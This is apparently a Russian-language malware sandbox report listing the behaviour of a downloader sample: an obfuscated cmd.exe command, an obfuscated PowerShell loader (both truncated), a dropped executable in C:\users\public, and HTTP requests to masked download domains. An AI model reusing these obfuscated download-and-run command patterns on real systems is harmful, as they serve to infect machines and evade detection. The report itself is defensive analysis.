Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' rokpXilhrqEBT hEMQzqnPKZdmGmiXwvMAHOPuVc zVnEIzBSVGu & %C^om^S^pEc% %C^om^S^pEc% /V /c set %vnizDGKmGOoAIIY%=hakAQorkwWi&&set %NwsJiVwRsQv%=p&&set %jGHjKu...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\158219.exe
Удаляет следующие файлы
- C:\users\public\158219.exe
Сетевая активность
Подключается к
- 'dr###amill.com':80
- 'me####d-kaffe.dk':80
- 'pr###owice.eu':80
- 'be##c.ro':443
TCP
Запросы HTTP GET
- http://dr###amill.com/f1XAhV/
- http://me####d-kaffe.dk/oDgHybA/
- http://pr###owice.eu/aupD/
Другие
- 'be##c.ro':443
UDP
- DNS ASK dr###amill.com
- DNS ASK sm####onsulting.com
- DNS ASK me####d-kaffe.dk
- DNS ASK pr###owice.eu
- DNS ASK be##c.ro
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' rokpXilhrqEBT hEMQzqnPKZdmGmiXwvMAHOPuVc zVnEIzBSVGu & %C^om^S^pEc% %C^om^S^pEc% /V /c set %vnizDGKmGOoAIIY%=hakAQorkwWi&&set %NwsJiVwRsQv%=p&&set %jGHjKu...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " &( $Env:COmsPeC[4,26,25]-joiN'')(( [runTIMe.INTeRopsErVicES.MArSHaL]::([ruNTIME.INTerOpsErviCEs.mARShal].GEtmEmberS()[2].NAme).INvOkE([RUNtImE.iNtEropSerVicEs.MaRshal]::seCUReSTRingtoGlOBaLAl...
